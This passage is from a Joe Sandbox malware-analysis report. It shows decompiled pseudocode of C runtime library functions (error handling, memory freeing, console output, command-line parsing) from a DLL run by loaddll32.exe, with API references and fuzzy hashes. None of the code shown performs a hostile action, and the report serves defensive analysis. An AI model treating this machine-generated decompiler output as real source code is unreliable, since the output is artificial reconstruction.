							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6E9EFCA5(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6E9ED437(GetLastError());
									_t19 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6E9EF0EB(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6E9ED437(GetLastError());
						return  *((intOrPtr*)(E6E9ED46D(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6E9EF0EB(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6E9EF0D1(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6e9eeab6
0x6e9eeabb
0x6e9eead9
0x6e9eeadb
0x6e9eeade
0x6e9eeb0b
0x6e9eeb13
0x6e9eeb15
0x6e9eeb2e
0x6e9eeb31
0x6e9eeb34
0x6e9eeb42
0x6e9eeb51
0x6e9eeb59
0x6e9eeb5b
0x6e9eeb74
0x6e9eeb77
0x6e9eeb77
0x6e9eeb5d
0x6e9eeb64
0x6e9eeb6f
0x6e9eeb6f
0x6e9eeb79
0x00000000
0x6e9eeb79
0x6e9eeb39
0x6e9eeb3e
0x6e9eeb40
0x00000000
0x00000000
0x00000000
0x6e9eeb40
0x6e9eeb1e
0x00000000
0x6e9eeb29
0x6e9eeae0
0x6e9eeae3
0x6e9eeae6
0x6e9eeaf9
0x6e9eeafc
0x6e9eeacf
0x6e9eeacf
0x00000000
0x6e9eead2
0x6e9eeaec
0x6e9eeaf1
0x6e9eeaf3
0x6e9eeb7d
0x6e9eeb7d
0x00000000
0x6e9eeaf3
0x6e9eeabd
0x6e9eeac2
0x6e9eeac7
0x6e9eeac9
0x6e9eeacc
0x00000000

APIs

Part of subcall function 6E9EF0D1: _free.LIBCMT ref: 6E9EF0DF

Part of subcall function 6E9EFCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6E9EE286,6E9F12A9,0000FDE9,00000000,?,?,?,6E9F1022,0000FDE9,00000000,?), ref: 6E9EFD51

GetLastError.KERNEL32 ref: 6E9EEB17
__dosmaperr.LIBCMT ref: 6E9EEB1E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E9EEB5D
__dosmaperr.LIBCMT ref: 6E9EEB64

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 8de9e3486de3f4f38312ac5bfc8f53e4a52a70ae4ba6404864fe61a81c6582f9
Instruction ID: 53f2e6e79a7748f1c23b096899726fd6b389ecea3f2955296dadf3302866230c
Opcode Fuzzy Hash: 8de9e3486de3f4f38312ac5bfc8f53e4a52a70ae4ba6404864fe61a81c6582f9
Instruction Fuzzy Hash: 3D21D871504605BFE7129FF69C80D57B7ACEF51368714891AFA2A93E90D730EC408F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ED9BC Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E6E9ED9BC(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6e9fc110; // 0x8
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E9EDF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6E9EDC48(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t51);
							if(__eflags != 0) {
								E6E9ED7BE(_t51, 0x6e9fd850);
								E6E9EDC0E(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6E9EDF59(__eflags,  *0x6e9fc110, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6E9EDF59(0,  *0x6e9fc110, 0);
							_push(0);
							L9:
							E6E9EDC0E();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6E9EDF1A(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6e9fc110; // 0x8
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6E9ED547(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6e9fc110; // 0x8
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6E9EDF59(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6E9EDC48(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t60);
								if(__eflags != 0) {
									E6E9ED7BE(_t60, 0x6e9fd850);
									E6E9EDC0E(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6E9EDF59(__eflags,  *0x6e9fc110, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6E9EDF59(__eflags,  *0x6e9fc110, _t20);
								_push(_t60);
								L25:
								E6E9EDC0E();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6E9EDF1A(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6e9fc110; // 0x8
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6E9ED547(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6e9fc110; // 0x8
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6E9EDF59(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6E9EDC48(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t54);
											if(__eflags != 0) {
												E6E9ED7BE(_t54, 0x6e9fd850);
												E6E9EDC0E(0);
												goto L45;
											} else {
												_t40 = 0;
												E6E9EDF59(__eflags,  *0x6e9fc110, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6E9EDF59(0,  *0x6e9fc110, 0);
											_push(0);
											L41:
											E6E9EDC0E();
											goto L36;
										}
									}
								} else {
									_t54 = E6E9EDF1A(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6e9fc110; // 0x8
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6e9ed9bc
0x6e9ed9bc
0x6e9ed9c7
0x6e9ed9c9
0x6e9ed9ce
0x6e9ed9d1
0x6e9ed9ef
0x6e9ed9f2
0x6e9ed9f7
0x6e9ed9f9
0x00000000
0x6e9ed9fb
0x6e9eda07
0x6e9eda0a
0x6e9eda0b
0x6e9eda0d
0x6e9eda32
0x6e9eda34
0x6e9eda4d
0x6e9eda54
0x6e9eda59
0x00000000
0x6e9eda36
0x6e9eda36
0x6e9eda3f
0x6e9eda44
0x00000000
0x6e9eda44
0x6e9eda0f
0x6e9eda0f
0x6e9eda0f
0x6e9eda18
0x6e9eda1d
0x6e9eda1e
0x6e9eda1e
0x6e9eda23
0x00000000
0x6e9eda23
0x6e9eda0d
0x6e9ed9d3
0x6e9ed9d9
0x6e9ed9dd
0x6e9ed9ea
0x00000000
0x6e9ed9df
0x6e9ed9e2
0x6e9eda5c
0x6e9eda5c
0x6e9ed9e4
0x6e9ed9e4
0x6e9ed9e4
0x6e9ed9e6
0x6e9ed9e6
0x6e9ed9e6
0x6e9ed9e2
0x6e9ed9dd
0x6e9eda5f
0x6e9eda67
0x6e9eda69
0x6e9eda6b
0x6e9eda73
0x6e9eda78
0x6e9eda79
0x6e9eda7e
0x6e9eda7f
0x6e9eda82
0x6e9eda9c
0x6e9eda9f
0x6e9edaa4
0x6e9edaa6
0x00000000
0x6e9edaa8
0x6e9edab4
0x6e9edab7
0x6e9edab8
0x6e9edaba
0x6e9edadd
0x6e9edadf
0x6e9edaf6
0x6e9edafd
0x6e9edb02
0x00000000
0x6e9edae1
0x6e9edae8
0x6e9edaed
0x00000000
0x6e9edaed
0x6e9edabc
0x6e9edac3
0x6e9edac8
0x6e9edac9
0x6e9edac9
0x6e9edace
0x00000000
0x6e9edace
0x6e9edaba
0x6e9eda84
0x6e9eda8a
0x6e9eda8c
0x6e9eda8e
0x6e9eda97
0x00000000
0x6e9eda90
0x6e9eda90
0x6e9eda93
0x6e9edb0d
0x6e9edb0d
0x6e9edb12
0x6e9edb15
0x6e9edb16
0x6e9edb17
0x6e9edb1e
0x6e9edb20
0x6e9edb25
0x6e9edb28
0x6e9edb46
0x6e9edb49
0x6e9edb4e
0x6e9edb50
0x00000000
0x6e9edb52
0x6e9edb5e
0x6e9edb62
0x6e9edb64
0x6e9edb89
0x6e9edb8b
0x6e9edba4
0x6e9edbab
0x00000000
0x6e9edb8d
0x6e9edb8d
0x6e9edb96
0x6e9edb9b
0x00000000
0x6e9edb9b
0x6e9edb66
0x6e9edb66
0x6e9edb66
0x6e9edb6f
0x6e9edb74
0x6e9edb75
0x6e9edb75
0x00000000
0x6e9edb7a
0x6e9edb64
0x6e9edb2a
0x6e9edb30
0x6e9edb32
0x6e9edb34
0x6e9edb41
0x00000000
0x6e9edb36
0x6e9edb36
0x6e9edb39
0x6e9edbb3
0x6e9edbb3
0x6e9edb3b
0x6e9edb3b
0x6e9edb3b
0x6e9edb3b
0x6e9edb3d
0x6e9edb3d
0x6e9edb3d
0x6e9edb39
0x6e9edb34
0x6e9edbb6
0x6e9edbbe
0x6e9edbc0
0x6e9edbc0
0x6e9edbc7
0x6e9eda95
0x6e9edb05
0x6e9edb05
0x6e9edb07
0x00000000
0x6e9edb09
0x6e9edb0c
0x6e9edb0c
0x6e9edb07
0x6e9eda93
0x6e9eda8e
0x6e9eda6d
0x6e9eda72
0x6e9eda72

APIs

GetLastError.KERNEL32(?,?,?,6E9F0D69,?,00000001,6E9EE2F7,?,6E9F1223,00000001,?,?,?,6E9EE286,?,00000000), ref: 6E9ED9C1
_free.LIBCMT ref: 6E9EDA1E
_free.LIBCMT ref: 6E9EDA54
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9F1223,00000001,?,?,?,6E9EE286,?,00000000,00000000,6E9FA968,0000002C,6E9EE2F7), ref: 6E9EDA5F

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8774e624700f46c3b123e3742e9f433a217c987b39ec636e987fd87681eb9331
Instruction ID: dd0e51dff4244c7f3e39ebd9b144bc09fbf43c2d6b4110f512730f674ba788a9
Opcode Fuzzy Hash: 8774e624700f46c3b123e3742e9f433a217c987b39ec636e987fd87681eb9331
Instruction Fuzzy Hash: 3511A07271C5027A9B4756F59C81A6E226E9FD22BCB210E24F739AABD0DB65CC018D50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EDB13 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E9EDB13(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6e9fc110; // 0x8
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E9EDF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6E9EDC48(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t18);
							if(__eflags != 0) {
								E6E9ED7BE(_t18, 0x6e9fd850);
								E6E9EDC0E(0);
								goto L13;
							} else {
								_t13 = 0;
								E6E9EDF59(__eflags,  *0x6e9fc110, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6E9EDF59(0,  *0x6e9fc110, 0);
							_push(0);
							L9:
							E6E9EDC0E();
							goto L4;
						}
					}
				} else {
					_t18 = E6E9EDF1A(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6e9fc110; // 0x8
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6e9edb1e
0x6e9edb20
0x6e9edb25
0x6e9edb28
0x6e9edb46
0x6e9edb49
0x6e9edb4e
0x6e9edb50
0x00000000
0x6e9edb52
0x6e9edb5e
0x6e9edb62
0x6e9edb64
0x6e9edb89
0x6e9edb8b
0x6e9edba4
0x6e9edbab
0x00000000
0x6e9edb8d
0x6e9edb8d
0x6e9edb96
0x6e9edb9b
0x00000000
0x6e9edb9b
0x6e9edb66
0x6e9edb66
0x6e9edb66
0x6e9edb6f
0x6e9edb74
0x6e9edb75
0x6e9edb75
0x00000000
0x6e9edb7a
0x6e9edb64
0x6e9edb2a
0x6e9edb30
0x6e9edb34
0x6e9edb41
0x00000000
0x6e9edb36
0x6e9edb39
0x6e9edbb3
0x6e9edbb3
0x6e9edb3b
0x6e9edb3b
0x6e9edb3b
0x6e9edb3d
0x6e9edb3d
0x6e9edb3d
0x6e9edb39
0x6e9edb34
0x6e9edbb6
0x6e9edbbe
0x6e9edbc7

APIs

GetLastError.KERNEL32(?,?,?,6E9ED472,6E9F0290,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7,?,?), ref: 6E9EDB18
_free.LIBCMT ref: 6E9EDB75
_free.LIBCMT ref: 6E9EDBAB
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7,?,?,00000004), ref: 6E9EDBB6

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7b9ce5e47eb9399377ef0fc0da2a4a77905459d8ea79ac9a648b1fb061466ba5
Instruction ID: cb2426093db115a57666725cc76ca2749648936d5132a7f0ab97371a7ed44636
Opcode Fuzzy Hash: 7b9ce5e47eb9399377ef0fc0da2a4a77905459d8ea79ac9a648b1fb061466ba5
Instruction Fuzzy Hash: 0C11C2726185016AD74746F95C81E6A235E9FD23B87284E24F33596BC0EA61CC018D50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F2BEE Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F2BEE(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6e9fc860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6E9F2BD7();
					E6E9F2B99();
					_t13 = WriteConsoleW( *0x6e9fc860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6e9f2c0b
0x6e9f2c0f
0x6e9f2c1c
0x6e9f2c21
0x6e9f2c3c
0x6e9f2c3c
0x6e9f2c42

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001), ref: 6E9F2C05
GetLastError.KERNEL32(?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?,00000001,?,6E9F1244,6E9EE286), ref: 6E9F2C11

Part of subcall function 6E9F2BD7: CloseHandle.KERNEL32(FFFFFFFE,6E9F2C21,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?,00000001), ref: 6E9F2BE7

___initconout.LIBCMT ref: 6E9F2C21

Part of subcall function 6E9F2B99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E9F2BC8,6E9F2777,00000001,?,6E9F0CF8,?,?,00000001,?), ref: 6E9F2BAC

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?), ref: 6E9F2C36

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 94836ffff2b6db931f6989f14b22137b75a14a0b2bc000c5efaddf13b3e6aa1e
Instruction ID: 886c8ab94524c36398b12193c29dbaa89c3e8f8d41509452e4c0b74130c1732d
Opcode Fuzzy Hash: 94836ffff2b6db931f6989f14b22137b75a14a0b2bc000c5efaddf13b3e6aa1e
Instruction Fuzzy Hash: 14F01C36104558BBCF121FE1EC08AC93F6AEF4B7A5F058410FE1996120C732CC20EB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ED260 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9ED260() {

				E6E9EDC0E( *0x6e9fd844);
				 *0x6e9fd844 = 0;
				E6E9EDC0E( *0x6e9fd848);
				 *0x6e9fd848 = 0;
				E6E9EDC0E( *0x6e9fd9c8);
				 *0x6e9fd9c8 = 0;
				E6E9EDC0E( *0x6e9fd9cc);
				 *0x6e9fd9cc = 0;
				return 1;
			}

0x6e9ed269
0x6e9ed276
0x6e9ed27c
0x6e9ed287
0x6e9ed28d
0x6e9ed298
0x6e9ed29e
0x6e9ed2a6
0x6e9ed2af

APIs

_free.LIBCMT ref: 6E9ED269

Part of subcall function 6E9EDC0E: HeapFree.KERNEL32(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9ED27C
_free.LIBCMT ref: 6E9ED28D
_free.LIBCMT ref: 6E9ED29E

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 140f0fba6359c6e7e6d7533f3616265f6f352c5068185027f94c0c84a0abc3d9
Instruction ID: ffee10e280a6d1227c949e178b854aadad9e6fd8cf8f0f6468ced24064e19f77
Opcode Fuzzy Hash: 140f0fba6359c6e7e6d7533f3616265f6f352c5068185027f94c0c84a0abc3d9
Instruction Fuzzy Hash: 39E046B080A921DACF121FA4BA016CD3FBAEFD7650B210506E40202310C7B180929FC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC978 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E9EC978(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E6E9EF8D2(_t48);
						E6E9EF319(_t48, _t57, 0, 0x6e9fd430, 0, 0x6e9fd430, 0x104);
						_t26 =  *0x6e9fd9d0; // 0x10732a0
						 *0x6e9fd9c0 = 0x6e9fd430;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6e9fd430;
							_v20 = 0x6e9fd430;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6E9ECC22(E6E9ECAAE( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6E9ECAAE( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6E9EF20C(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6e9fd9c4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6e9fd9c8 = _t58;
											L18:
											E6E9EDC0E(_t37);
											_v12 = 0;
											L19:
											E6E9EDC0E(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6e9fd9c4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6e9fd9c8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6E9ED46D(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6E9ED46D(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6E9EC24F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6e9ec978
0x6e9ec981
0x6e9ec986
0x6e9ec990
0x6e9ec993
0x6e9ec9b0
0x6e9ec9b1
0x6e9ec9c4
0x6e9ec9c9
0x6e9ec9d1
0x6e9ec9d7
0x6e9ec9da
0x6e9ec9dc
0x6e9ec9e3
0x6e9ec9e3
0x6e9ec9e5
0x6e9ec9e8
0x6e9ec9eb
0x6e9ec9f2
0x6e9eca0b
0x6e9eca10
0x6e9eca12
0x6e9eca33
0x6e9eca3b
0x6e9eca3e
0x6e9eca59
0x6e9eca5c
0x6e9eca63
0x6e9eca67
0x6e9eca69
0x6e9eca70
0x6e9eca73
0x6e9eca75
0x6e9eca77
0x6e9eca79
0x6e9eca83
0x6e9eca83
0x6e9eca85
0x6e9eca8b
0x6e9eca8e
0x6e9eca90
0x6e9eca96
0x6e9eca97
0x6e9eca9d
0x6e9ecaa0
0x6e9ecaa1
0x6e9ecaa7
0x6e9ecaaa
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eca7b
0x6e9eca7b
0x6e9eca7b
0x6e9eca7e
0x6e9eca7f
0x6e9eca7f
0x00000000
0x6e9eca7b
0x6e9eca6b
0x00000000
0x6e9eca6b
0x6e9eca43
0x6e9eca43
0x6e9eca44
0x6e9eca49
0x6e9eca4b
0x6e9eca4d
0x6e9eca52
0x6e9eca52
0x00000000
0x6e9eca52
0x6e9eca14
0x6e9eca19
0x6e9eca1b
0x6e9eca1c
0x00000000
0x6e9eca1c
0x6e9ec9de
0x6e9ec9e1
0x00000000
0x00000000
0x00000000
0x6e9ec9e1
0x6e9ec995
0x6e9ec998
0x00000000
0x00000000
0x6e9ec99a
0x6e9ec9a1
0x6e9ec9a2
0x6e9ec9a4
0x6e9ec9a9
0x00000000
0x6e9ec9a9
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E9EC9BB, 6E9EC9F8

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: dfce580ba26044b80e785f7405de5fec53be0a1c5b15daf92b5766bafa233246
Instruction ID: 90e943c568e6010200ce4c43b3bcecc79db5cea057d7c23737b39c52776a0d0e
Opcode Fuzzy Hash: dfce580ba26044b80e785f7405de5fec53be0a1c5b15daf92b5766bafa233246
